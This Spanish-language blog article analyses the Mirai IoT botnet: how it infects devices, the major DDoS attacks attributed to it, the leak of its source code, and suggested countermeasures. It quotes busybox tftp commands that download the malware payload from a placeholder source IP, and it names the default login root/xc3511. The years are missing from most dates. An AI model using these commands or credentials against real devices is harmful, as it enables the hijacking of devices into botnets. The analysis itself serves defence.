Análisis de malware
La botnet Mirai: un hito en el panorama de amenazas
noviembre 28, por Admin
Agosto de, MalwareMustDie detectó el malware Mirai
En agosto de, el investigador MalwareMustDie analizó muestras de una nueva puerta trasera troyana ELF, denominada ELF Linux/Mirai, diseñada específicamente para atacar dispositivos IoT . El nombre del malware es el mismo que el del binario, «mirai.*».
En el momento de su descubrimiento, ELF Linux/Mirai no fue detectado por muchas soluciones antivirus, como explica MalwareMustDie.
«La razón de la falta de detección se debe a la falta de muestras, que son difíciles de obtener de los dispositivos IoT, enrutadores, DVR o cámaras WebIP infectados , el binario Linux con Busybox en la plataforma integrada, a lo que apunta esta amenaza. » afirma el análisis del Blog MalwareMustDie.
El último ELF examinado por Asuntos de Seguridad fue el troyano Linux.PNScan , que se ha dirigido activamente a enrutadores basados en Linux x86 en un intento de instalar puertas traseras en ellos.
MalwareMustDie confirmó que Linux/Mirai » es mucho más grande que PnScan «.
«La amenaza comenzó su campaña a principios de agosto, incluso si este ELF no es fácil de detectar ya que no muestra su actividad poco después de ser instalado: permanece allí y, durante ese tiempo, no quedará ningún archivo de malware en el sistema. , todos se eliminan excepto el proceso retrasado donde el malware se ejecuta después de ser ejecutado». añadió MalwareMustDie.
Los expertos destacaron que para determinar una infección Mirai era fundamental analizar la memoria de los dispositivos comprometidos porque el análisis realizado desde el sistema de archivos o desde el tráfico de la red externa no aporta ninguna evidencia, al principio.
Los dispositivos integrados Linux Busybox IoT que pueden conectarse a Internet, como DVR o cámaras IP web de varias marcas, están expuestos a la amenaza, especialmente cuando el acceso al servicio del puerto Telnet (Tcp/23) no está protegido adecuadamente.
Pero, ¿qué sabemos exactamente sobre este malware Linux/Mirai ELF y por qué no es tan común entre los analistas de malware?
Los atacantes piratearon dispositivos IoT a través de cuentas SSH o Telnet aprovechando vulnerabilidades conocidas o utilizando contraseñas predeterminadas que no fueron modificadas por el propietario de los sistemas objetivo.
Este tipo de ELF utiliza una técnica específica para bifurcarse en un nuevo proceso si se cumplen las condiciones de infección del dispositivo actual. De lo contrario, el nodo es seguro y la instalación no continúa.
Una vez obtenido acceso al shell en el dispositivo, los atacantes descargarán la carga útil del malware ELF Linux/Mirai. A continuación se muestra un ejemplo del comando iniciado en un dispositivo IoT para realizar la operación:
‘busybox tftp’ -r [ArchivoMalware] -g [fuenteIP]
‘busybox tftp’ -g -l ‘dvrHelper’ -r [ArchivoMalware] [IPsource]
Fue muy difícil analizar la infección de Linux/Mirai porque una vez ejecutado el malware también es capaz de eliminar rastros de su presencia.
«En algunos casos, la infección de Linux/Mirai muestra rastros de que el malware se ejecutó sin parámetros y hay casos en los que los archivos de malware descargados se eliminan después de la ejecución. En este caso, la mayoría de las veces no obtendrá las muestras a menos que volcas el proceso de malware al binario ELF. Esto explica que sea difícil obtener muestras que funcionen bien para esta nueva amenaza». continúa el equipo de MalwareMustDie.
«Tras la ejecución, el malware se autoeliminará para evitar el seguimiento, pero el proceso se está ejecutando. En algunos IoT, eso se puede ver en lsof o en la lista de /proc con un PID específico, es decir:»
/proc/{PID}/exe – ‘/dev/.{algo}/dvrHelper’ (eliminado)
/proc/{PID}/exe – ‘./{cadenas largas del alfabeto}’ (eliminado)
Mientras se ejecuta el proceso, el malware abre PF_INET, un socket de red UNIX para TCP, y lo vincula al puerto TCP/48101 desde la dirección IP localhost 127.0.0.1 y luego comienza a escuchar la conexión entrante. El malware se bifurca a un nuevo proceso con un nuevo PID de proceso, «el dispositivo infectado realizará la conexión a los servicios Telnet en otros dispositivos con el fin de seguir abusando».
1: Rastreador de botnet Mirai
Una larga ola de ciberataques
El ataque más popular impulsado por una botnet Mirai es el DDoS masivo dirigido al servicio DNS de la empresa Dyn , uno de los proveedores de sistemas de nombres de dominio (DNS) más autorizados.
El ataque provocó una interrupción prolongada de Internet para una gran parte de los usuarios de Internet en los EE. UU. que no pudieron acceder a los servicios web más importantes. Muchos sitios web como Twitter, GitHub, PayPal, Amazon, Reddit, Netflix y Spotify estaban inactivos para los internautas en Estados Unidos.
El ataque fue el último en orden de tiempo de una secuencia de DDoS que afectó al sitio web de Brian Krebs y al proveedor de alojamiento francés OVH que alcanzó un máximo de 1 Tbps .
La firma de inteligencia de seguridad Flashpoint publicó un interesante post sobre el DDoS masivo contra Dyn DNS confirmando que los botnets Mirai fueron los principales responsables.
«Flashpoint ha confirmado que parte de la infraestructura responsable de los ataques de denegación de servicio distribuido (DDoS) contra Dyn DNS eran botnets comprometidas por el malware Mirai. Los botnets Mirai se utilizaron anteriormente en ataques DDoS contra el blog del investigador de seguridad Brian Krebs «Krebs On Seguridad» y proveedor francés de alojamiento y servicios de Internet OVH.» lee el análisis publicado por Flashpoint : «El malware Mirai se dirige a dispositivos de Internet de las cosas (IoT), como enrutadores, grabadoras de vídeo digitales (DVR) y cámaras web/cámaras de seguridad, esclavizando a un gran número de estos dispositivos en una red de bots, que luego se utiliza para realizar ataques DDoS. ataques.»
Los ataques masivos DDoS duraron hace unos días y afectaron a algunos proveedores de Internet liberianos, según explicó el investigador de seguridad Kevin Beaumont.
Beaumont le dio crédito a la botnet Mirai por los ataques que afectaron al país africano, llamó a esta botnet #14 «Shadows Kill», basándose en el mensaje que enviaron.
2: Cable de Internet en Liberia
Beaumont le dio crédito a la botnet Mirai por los ataques que afectaron al país africano, llamó a esta botnet #14 «Shadows Kill», basándose en el mensaje que enviaron.
«Durante la semana pasada, hemos visto continuos ataques de corta duración a la infraestructura en la nación de Liberia. Liberia tiene un cable de Internet, instalado en, que proporciona un único punto de falla para el acceso a Internet. Desde el monitoreo podemos ver sitios web alojados Además, una fuente de una empresa de telecomunicaciones en el país confirmó a un periodista que están viendo una conexión a Internet intermitente, en momentos que coinciden directamente con el ataque. Los ataques son extremadamente preocupantes porque sugieren que un operador de Mirai tiene suficiente capacidad para impactar seriamente los sistemas en un estado nación». Beaumont escribió en una publicación de blog .
La Botnet #14 fue capaz de generar un volumen de tráfico superior a 500 Gbps, suficiente para provocar una interrupción masiva en un país como Liberia.
Unos días más tarde, una serie de ataques DDoS prolongados afectaron al menos a cinco bancos rusos, y una vez más el botnet Mirai es el principal sospechoso.
Entre las víctimas de los ataques DDoS contra los servicios bancarios en línea se encuentran los bancos Sberbank y Alfabank. Según un funcionario anónimo del Banco Central Ruso, los atacantes utilizaron una botnet de dispositivos IoT , probablemente una botnet Mirai .
La serie de ataques DDoS contra los bancos duró más de dos días.
«Al menos cinco grandes bancos rusos sufrieron ataques continuos de piratas informáticos, aunque los servicios de clientes en línea no se vieron afectados. El ataque provino de una botnet a gran escala que involucró al menos a 24.000 ordenadores, ubicados en 30 países». lee RT.com .
«El ataque comenzó el martes por la tarde y continuó durante dos días seguidos, según una fuente cercana al Banco Central de Rusia citada por RIA Novosti. Sberbank confirmó el ataque DDoS a sus servicios en línea.»
«Los ataques se llevan a cabo desde botnets, que consisten en decenas de miles de ordenadores ubicados en decenas de países», dijo a RIA el servicio de prensa de Sberbank.
Por qué la botnet Mirai está monopolizando el panorama de amenazas
Dos factores, sobre todo, hacen que esta amenaza sea realmente insidiosa:
- La disponibilidad del código fuente en línea.
- El malware Mirai se dirige a dispositivos IoT.
El código fuente de la botnet fue filtrado en el popular foro de hackers criminales Hackforum a principios de octubre por un usuario con el apodo «Anna-senpai» que compartió el enlace al código fuente del malware «Mirai».
«La filtración del código fuente se anunció el viernes en la comunidad de hackers en inglés Hackforums . El malware, denominado ‘ Mirai’, se propaga a dispositivos vulnerables escaneando continuamente Internet en busca de sistemas IoT protegidos por defecto de fábrica o con nombres de usuario y contraseñas codificados. » informó Krebs.
3: La publicación de Anna-senpai anuncia la filtración pública del código fuente de Mirai
La disponibilidad del código fuente de Mirai Botnet en la naturaleza, en teoría, hizo posible que todos pudieran impulsar esta botnet.
Ya expresé mi opinión sobre la filtración del código fuente de Mirai. Creo que la filtración es parte de una estrategia más amplia de una determinada categoría de atacantes que pretenden realizar ataques masivos de poder que imposibiliten la atribución.
Hay varias botnets Mirai en libertad, según lo confirmado por los expertos en seguridad de FlashPoint. El ataque DDoS que afectó al servicio DNS Dyn fue impulsado por una botnet diferente a la utilizada contra el sitio web de Krebs y el servicio de hosting de OVH.
«Si bien Flashpoint ha confirmado que las botnets Mirai se utilizaron en el ataque del 21 de octubre de contra Dyn, eran botnets separadas y distintas de las utilizadas para ejecutar los ataques DDoS contra «Krebs on Security» y OVH. A principios de este mes, «Anna_Senpai «, el hacker que operaba la gran botnet Mirai utilizada en Krebs DDoS, publicó el código fuente de Mira en línea». continúa Flashpoint «Desde este lanzamiento, los piratas informáticos imitadores han utilizado el malware para crear sus propias botnets para lanzar ataques DDoS».
El segundo factor que contribuyó al éxito de la botnet Mirai es el hecho de que fue diseñada específicamente para piratear dispositivos vulnerables de Internet de las cosas (IoT).
El análisis del código fuente de Mirai reveló que incluye una lista de 60 pares de nombres de usuario y contraseñas utilizados por el malware para comprometer dispositivos IoT.
La lista de credenciales de inicio de sesión incluye la combinación predeterminada de nombre de usuario y contraseña root/xc3511 que, según los expertos de Flashpoint, permitió el hackeo en la mayoría de los dispositivos que componen la botnet Mirai.
La botnet estaba compuesta principalmente por dispositivos de videovigilancia fabricados por Dahua Technology.
«Mientras investigaba los recientes ataques distribuidos de denegación de servicio (DDoS) a gran escala, Flashpoint identificó al principal fabricante de los dispositivos que utilizan la combinación predeterminada de nombre de usuario y contraseña conocida como root y xc3511». lee un informe publicado por Flashpoint.
«Este tipo de credenciales existen en Internet y se utilizan comúnmente a través de Telnet para acceder a numerosos tipos de DVR. De hecho, innumerables fabricantes de DVR compran piezas precargadas con Linux y software de gestión rudimentario de una empresa llamada XiongMai Technologies, ubicada en Hangzhou, China. «.
Muchos fabricantes de dispositivos utilizan componentes de la empresa china XiongMai Technologies. Según los expertos, hay al menos medio millón de dispositivos en todo el mundo que utilizan estos componentes vulnerables a los que se puede acceder con credenciales predeterminadas.
«Las credenciales predeterminadas representan una pequeña amenaza cuando no se puede acceder a un dispositivo desde Internet. Sin embargo, cuando se combinan con otras configuraciones predeterminadas, como interfaces web o servicios de inicio de sesión remoto como Telnet o SSH, las credenciales predeterminadas pueden representar un gran riesgo para un dispositivo». continúa el informe. «En este caso, las credenciales predeterminadas se pueden utilizar para «Telnet» a dispositivos vulnerables, convirtiéndolos en «bots» en una botnet».
El mayor riesgo relacionado con el firmware proporcionado por el fabricante chino está relacionado con la combinación de credenciales codificadas por defecto y la disponibilidad de un servicio Telnet que está activo por defecto y que permite el acceso remoto a los dispositivos.
«Los dispositivos Dahua se identificaron tempranamente debido a su interfaz distintiva y su uso reciente en otras botnets. Utilizando las «botnets». Utilizando la » Herramienta de identificación de bajo impacto » o LIFT, Flashpoint pudo identificar una gran cantidad de estos dispositivos en los datos de ataque proporcionados», afirma el informe.
«El problema con estos dispositivos en particular es que un usuario no puede cambiar esta contraseña. La contraseña está codificada en el firmware y las herramientas necesarias para desactivarla no están presentes. Peor aún, la interfaz web no es consciente de que estas credenciales incluso Para agravar aún más el problema, el servicio Telnet también está codificado en /, etc./init.d/rcS (el script de inicio del servicio principal), lo cual no es fácil de editar. La combinación del servicio predeterminado y el código fijo Las credenciales han llevado a la asignación de CVE–1000245 por parte del Distributed Weakness Filing Project .
Flashpoint escaneó Internet con el motor de búsqueda Shodan en busca de dispositivos IoT defectuosos.
FlashPoint detectó más de 500.000 dispositivos vulnerables en la naturaleza; los países con el mayor número de dispositivos vulnerables son Vietnam (80.000), Brasil (62.000) y Turquía (40.000).
4 – Objetivos potenciales de Mirai
Si está interesado en saber más sobre la difusión de Mirai Botnet, puede utilizar este rastreador en línea que informa más de 3,1 millones de IP asociadas con dispositivos infectados por el código Mirai en estado salvaje. Tenga en cuenta que este no es el número exacto de dispositivos infectados, ya que muchos de ellos utilizan IP dinámicas.
5: Rastreador en línea de Mirai Botnet
Hackear la botnet Mirai
La disponibilidad del código fuente de Mirai permitió a los expertos revisarlo y descubrir una debilidad que podría explotarse para cerrar la botnet e impedir que inunde los objetivos con solicitudes HTTP.
Esto significa que es posible contraatacar la amenaza adoptando un modelo de defensa activa, una postura que tiene importantes implicaciones legales porque el contraataque es ilegal según la Ley de Abuso y Fraude Informático.
Hackear un bot significa obtener acceso no autorizado a un sistema informático y este tipo de operaciones deben estar autorizadas por orden judicial.
La posibilidad de hackear la botnet Mirai fue planteada por investigadores de la firma Invincea que descubrieron tres vulnerabilidades en el código Mirai. Uno de los fallos, un desbordamiento del buffer de pila, podría aprovecharse para detener el ataque DDoS impulsado por la botnet. La vulnerabilidad de desbordamiento del búfer afecta la forma en que Mirai analiza las respuestas de los paquetes HTTP.
«Quizás el hallazgo más significativo es una vulnerabilidad de desbordamiento del búfer de pila en el código de ataque de inundación HTTP. Cuando se explota, provocará una falla de segmentación (es decir, SIGSEV), bloqueará el proceso y, por lo tanto, terminará el ataque de ese robot. El código vulnerable tiene que ver con cómo Mirai procesa el encabezado de ubicación HTTP que puede ser parte de la respuesta HTTP enviada desde una solicitud de inundación HTTP». informó el análisis publicado por la firma de seguridad Invincea.
Los investigadores destacaron que su ataque no habría ayudado en el ataque DDoS basado en DNS contra el proveedor Dyn, pero detendría las capacidades de ataque de Capa 7 de la botnet Mirai implementada en el código filtrado en línea.
Los expertos de Invincea probaron con éxito una prueba de concepto de exploit en un entorno virtual configurando una instancia de depuración del bot Mirai, un servidor de comando y control y una máquina de destino.
«Este simple «exploit» es un ejemplo de defensa activa contra una botnet de IoT que podría ser usado por cualquier servicio de mitigación de DDoS para defenderse contra un ataque de inundación HTTP basado en Mirai en tiempo real. Si bien no se puede usar para eliminar el bot desde el dispositivo IoT, se puede utilizar para detener el ataque que se origina desde ese dispositivo en particular. Desafortunadamente, es específico del ataque de inundación HTTP, por lo que no ayudaría a mitigar el reciente ataque DDoS basado en DNS que hizo que muchos sitios web fueran inaccesibles». explicó Scott Tenaglia, director de investigación del equipo de capacidades cibernéticas de Invincea Labs.
Tenaglia comentó que el método propuesto por la empresa no limpia los dispositivos comprometidos. En cambio, podría ser eficaz contra la inundación HTTP impulsada por Mirai Botnet.
Invincea ha hecho un trabajo excelente y no sugiere el hackeo, pero limitó su análisis al aspecto técnico de la botnet Mirai y sus vulnerabilidades.
«Está en el espacio gris de la defensa activa», dijo Tenaglia a ThreatPost. «En el mundo de la defensa, este es un tema muy controvertido. Digamos que si su IoT ya está comprometido y ya se está ejecutando un código incorrecto, si le hago algo al código del malo, ¿estoy infringiendo la ley?»
«Nunca comentaría sobre la legalidad de esto», dijo Tenaglia. «Creo que esto nos da otro punto para discutir con respecto a la defensa activa. ¿Es esto algo que creemos que está bien? No creo que dañe el sistema; podría ayudarlo. Si un bot está degradando el rendimiento de la conexión a Internet debido a los paquetes que envía, y si este ataque mata el proceso y la conexión mejora, ¿le hemos ayudado? Por eso esta es un área gris».
Conclusión
Los ataques DDoS a gran escala siguen siendo una amenaza peligrosa para los servicios web en todo el mundo. Los dispositivos IoT mal configurados y defectuosos representan un ataque privilegiado; por esta razón, los fabricantes de IoT necesitan seriamente revisar el nivel de seguridad implementado en sus productos.
Volviendo a la botnet Mirai, los administradores de sistemas que quieran proteger sus sistemas podrían adoptar las siguientes contramedidas:
- Si tiene un dispositivo IoT, asegúrese de no tener ningún servicio Telnet abierto y en ejecución .
- Bloquear el puerto TCP/48101 usado si no lo usa, es bueno para prevenir infecciones y daños mayores.
- Supervise las conexiones Telnet porque el protocolo Botnet utilizado para la infección es el servicio Telnet.
- Invierta el proceso buscando las cadenas informadas en las sugerencias sobre herramientas de detecciones de MalwareMustDie.
Permítanme cerrar con un par de preguntas y respuestas a los investigadores MalwareMustDie sobre las capacidades reales de Mirai Botnet.
P: ¿Cuáles son las capacidades de Mirai Botnet?
R: La botnet Mirai puede causar un gran daño, según varias «demostraciones» que incluyeron el ataque a Liberia. La amenaza es realmente poderosa, como mencioné por primera vez en la entrevista de Security Affair . La manera de detenerlo es, o impulsar el esfuerzo para arrestar a los ‘skiddes’ que se relacionan con esta botnet, y ser más estrictos en las reglas/políticas para los abusos de DDoS, o ser más agresivos para eliminar los dispositivos IoT infectados. En serio, el tiempo es crítico, pero muchas personas aún no actúan más rápido. Si permitimos que esto suceda al ritmo actual, en esta Navidad o año nuevo algunos países y servicios también pueden cerrarse… y pueden hacerlo.
P: ¿Es posible utilizar Mirai para cerrar un país como el Reino Unido o Francia?
R: Si saben qué punto atacar, SÍ. Provocaron una importante interrupción de Internet en Estados Unidos durante algunas horas, y Estados Unidos tiene la columna vertebral de Internet más sólida del planeta.
¿Cómo verifica si su organización está expuesta a la botnet Mirai?
La empresa de IoT Defense Inc. desarrolló un escáner web gratuito, el escáner IoT Defense , que permite a los administradores determinar si su red está expuesta a la botnet Mirai. La herramienta web busca casi una docena de puertos TCP abiertos e informa a los usuarios si están expuestos a Mirai o no.
La herramienta fue diseñada para buscar puertos como File Transfer Protocol (FTP), Secure Shell (SSH), Telnet (ambos 23 y el alternativo 2323), HTTP, HTTPS, Microsoft-SQL-Server, EtherNet/IP, Telnet (alternativo ), Protocolo de escritorio remoto de Microsoft (RDP), Proxy web y Apache Tomcat SSL (HTTPS).
La botnet IoT escanea Internet en busca de dispositivos IoT vulnerables y, cuando los encuentra, intenta iniciar sesión en ellos utilizando una lista de credenciales de inicio de sesión predeterminadas.
Pruébelo, con solo hacer clic en un botón podrá obtener información valiosa.
Referencias
http://securityaffairs.co/wordpress/50929/malware/linux-mirai-elf.html
http://securityaffairs.co/wordpress/52544/breaking-news/dyn-dns-service-ddos.html
http://securityaffairs.co/wordpress/52558/iot/dyn-dns-service-ddos-2.html
http://securityaffairs.co/wordpress/52821/hacking/mirai-botnet-2.html
http://securityaffairs.co/wordpress/53054/malware/shadows-kill-liberia-outage.html
http://securityaffairs.co/wordpress/52583/hacking/dyn-dns-service-ddos-3.html
http://securityaffairs.co/wordpress/53054/malware/shadows-kill-liberia-outage.html
http://securityaffairs.co/wordpress/5/hacking/mirai-botnet.html
http://www.wsj.com/articles/denial-of-service-web-attack-affects-amazon-twitter-others-1477056080
https://intel.malwaretech.com/botnet/mirai/?h=24
http://www.securityweek.com/web-based-tool-checks-if-your-network-exposed-mirai
http://securityaffairs.co/wordpress/52313/cyber-crime/sierra-wireless-mirai.html
http://securityaffairs.co/wordpress/51669/hacking/internet-takedown.html
https://resources.infosecinstitute.com/a-ddos-attack-hit-the-dyn-managed-dns-is-someone-trying-to-cause-an-internet-takedown/